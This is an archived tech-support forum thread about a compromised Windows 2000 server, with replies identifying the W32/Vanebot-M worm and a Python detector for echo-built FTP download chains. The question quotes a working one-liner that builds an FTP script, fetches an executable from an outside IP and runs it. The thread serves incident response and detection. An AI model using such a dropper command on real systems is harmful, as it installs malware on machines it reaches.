Solved

Compromised Windows 2000 Server?

Posted on 2006-10-25
Last Modified: 2010-04-11
Hi,

I logged into a Win2k Server in a remote office this morning and was greeted by two FTP DOS screens with the following in them:

83.70.16.16 Microsoft FTP
get 84785_redworld2.exe etc. etc.

Then there is some reference to 'Lizard Welcomes You' after FTP login.


This was in Start - Run:

cmd /c echo OPEN 83.70.16.16 29212>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

It certainly appears that the server has been accessed from an external source. We use a Sonicwall firewall, and the server is fully patched. Can anyone shed some light on this please?



Question by:spower22
14 Comments
 
LVL 8

Accepted Solution

by:
mugman21 earned 500 total points
ID: 17801818
I'm guessing someone in the office downloaded something nasty, or opened an email attachment. This would have to be the case... Firewalls block inbound traffic, but allow it if outbound preceded it.

Is this a webserver, or is this a fileserver or something that is local only to your company's internal network?

If that was in Run, then several things come to mind. First, internal attack - but I doubt it. Second thought, you obviously have some sort of remote management software running, and someone obviously got the pass and username. However you got in remotely, they took the same path.

If you're running VNC, there is a zero-day in it.. The company can't seem to locate it, I've yet to find it, but someone has. I had a box running the newest version with all patches and fixes, everything configured properly. Some bastard still got in....

VNC here?????

m.

 
LVL 18

Expert Comment

by:PowerIT
ID: 17801820
You captured a worm. Are people surfing or IM'ing on the server itself?

W32/Vanebot-M is a worm for the Windows platform. W32/Vanebot-M also contains IRC backdoor Trojan functionality which allows a remote intruder to gain access and control over the computer.

W32/Vanebot-M spreads:
to computers vulnerable to common exploits, including SRVSVC (MS06-040)
to MSSQL servers protected by weak passwords
to network shares
via MSN Messenger
via Yahoo Instant Messenger

W32/Vanebot-M may spread with the filename redworld.exe, redworld2.exe or <random numbers>_redworld2.exe.


J.
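The Run-box string in the question and the filenames PowerIT lists describe one download chain: a series of echo commands writes an FTP script, ftp -n -s: replays it non-interactively, and the fetched file is then executed. The detector below is added here as an example and is not code from the thread; it pulls the host, port, script name and fetched files out of such a command line (as found in a Run MRU dump or a process-creation log) and flags the Vanebot naming pattern. The sample command lines are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the Start > Run string quoted in the question,
# plus two benign command lines that must not be flagged.
SAMPLE_COMMANDS = [
    "cmd /c echo OPEN 83.70.16.16 29212>x&echo GET 84785_redworld2.exe>>x"
    "&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit",
    "cmd /c dir C:\\Windows",
    "ftp -n -s:backup.txt",
]

# Pieces of an echo-built FTP script: OPEN host [port] > script,
# GET file >> script, and the ftp -s:script call that replays it silently.
OPEN_RE = re.compile(r"echo\s+OPEN\s+(\d{1,3}(?:\.\d{1,3}){3})(?:\s+(\d+))?\s*>\s*([^\s&|]+)", re.I)
GET_RE = re.compile(r"echo\s+GET\s+([^\s&|>]+)\s*>>\s*([^\s&|]+)", re.I)
FTP_RE = re.compile(r"\bftp\b[^&|]*-s:([^\s&|]+)", re.I)
# Filenames PowerIT lists for W32/Vanebot-M: redworld.exe, redworld2.exe, <digits>_redworld2.exe
VANEBOT_NAME_RE = re.compile(r"^(?:\d+_)?redworld2?\.exe$", re.I)

@dataclass
class FtpDropper:
    host: str
    port: int
    script: str
    files: List[str] = field(default_factory=list)
    executes_payload: bool = False  # a fetched file is later run as its own command
    matches_vanebot_name: bool = False

def analyze_command(cmd: str) -> Optional[FtpDropper]:
    """Return details of an echo-built FTP download chain in cmd, or None."""
    m = OPEN_RE.search(cmd)
    if not m:
        return None
    host, port, script = m.group(1), int(m.group(2) or 21), m.group(3)
    replay = FTP_RE.search(cmd)
    if not replay or replay.group(1).lower() != script.lower():
        return None  # script written but never fed to ftp -s:, so not this pattern
    files = [f for f, s in GET_RE.findall(cmd) if s.lower() == script.lower()]
    segments = {seg.strip().lower() for seg in re.split(r"&&?|\|\|?", cmd)}
    return FtpDropper(
        host=host, port=port, script=script, files=files,
        executes_payload=any(f.lower() in segments for f in files),
        matches_vanebot_name=any(VANEBOT_NAME_RE.match(f) for f in files),
    )

def scan_commands(commands: List[str]) -> List[FtpDropper]:
    """Apply analyze_command to a batch of lines, e.g. a Run MRU dump or process-creation log."""
    return [r for r in (analyze_command(c) for c in commands) if r is not None]
```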
 
LVL 18

Expert Comment

by:PowerIT
ID: 17801822
As it also spreads through shares and weak SQL Server passwords, it could have entered through a client PC as well.
Depending on how well all your rights are set up, it can be from an admin box, but also from a normal client.

J.
 
LVL 18

Expert Comment

by:PowerIT
ID: 17801988
Like mugman said: it could also have been installed manually through another exploit. His VNC vulnerability is an example, but there are tons of others.
Hope you can clean this out.

J.
 
LVL 2

Expert Comment

by:Machin__Shin
ID: 17802370
Don't forget to check the built-in user accounts for new admin accounts like qq$ or such. I had something similar; in the end I blocked all non-essential outbound traffic from the server and restricted everything by IP address/range, the range being within the country I am in, for web-based remote stuff for end users. I was able to remove all the traces in the end and haven't heard bo-peep from it since in terms of problems.
 
LVL 8

Expert Comment

by:mugman21
ID: 17802406
The reason I specified the remote software or someone on the inside (i.e. pissed off employee) is this: the string left in the RUN's cache. Worms and viruses shell themselves or use some other programmatic technique to launch their payload. If someone got in through remote admin, they would navigate through the system as if they were sitting in front of it (view of the screen), thus, RUN's command cache is left.

m.
 
LVL 4

Expert Comment

by:expexchuser
ID: 17807062
Looks like you've made a friend in Dublin, me lad...
http://www.dnsstuff.com/tools/whois.ch?ip=83.70.16.16
 
LVL 2

Expert Comment

by:Machin__Shin
ID: 17809454
Don't be silly, it's probably some poor zombie computer bwaaaaah. On a serious note, use your antivirus to clean up the executables and close up your firewall to be limited by IP for remote access. Then check for traces in the Services, Registry start-up locations, filter drivers and AD OUs. Of course, patch up your rig.
 
LVL 8

Expert Comment

by:mugman21
ID: 17809999
Machin, antivirus is worthless most of the time. The OP has already stated he is running with full patches, and since this is a corporate machine, I'm pretty damn sure it already has AV installed and the on-access check failed. Why would an on-access check fail? Here's a concept: I can write viruses all day long and no AV product will pick them up until they see the evilness I've created... They have to see the work before they can generate signatures; bloodhound tech sucks.

What makes you think he didn't have a root kit installed?

Come on now.....

m.
 
LVL 2

Expert Comment

by:Machin__Shin
ID: 17810242
Sounds like you use Symantec... I did a scan with a fully heuristic-enabled Symantec with an on-demand scan. It picked up 3 of the things that the hacker used. I used NOD32 with full heuristics enabled and it picked up 43. And quite a few antivirus packages claim that they scan for rootkits as well.

But yeah, I know what you mean. All depends on what the person used and how far the OP was able to intercede. From the looks of it they used some pretty generic stuff though, like they are only a script kiddie if they are downloading stuff that has already been labelled by Symantec itself. Doesn't look like custom-written tools.
 
LVL 8

Expert Comment

by:mugman21
ID: 17810262
From my experience with the little VNC problem; I suppose that is still fresh in my mind.

And no, I don't use Symantec, I'm white listing with my very own beta 2.... :-)

m.
 
LVL 2

Expert Comment

by:Machin__Shin
ID: 17810437
I wish the author would actually comment on what type of remote client they used. I also have encountered the VNC problem.

Good on you and good luck ^_^, is it written in assembly? Personally I think that you answered the question with the first post. I'm just chucking in my two cents. But if I get a couple of points chucked my way I would be happy.
 
LVL 8

Expert Comment

by:mugman21
ID: 17810522
I have a little assembler in a SHA-1 function, mostly C though. Working to port parts to Delphi. I have a couple of DLLs in VB too. It's working, still need to overhaul it, need more consistency in language/tools used. I need to get away from the assembler though....
 

Author Comment

by:spower22
ID: 17848572
Thanks for all your comments. I've secured VNC access on the firewall to only accept calls from my static IP and all seems OK now. Again, thanks for the responses.
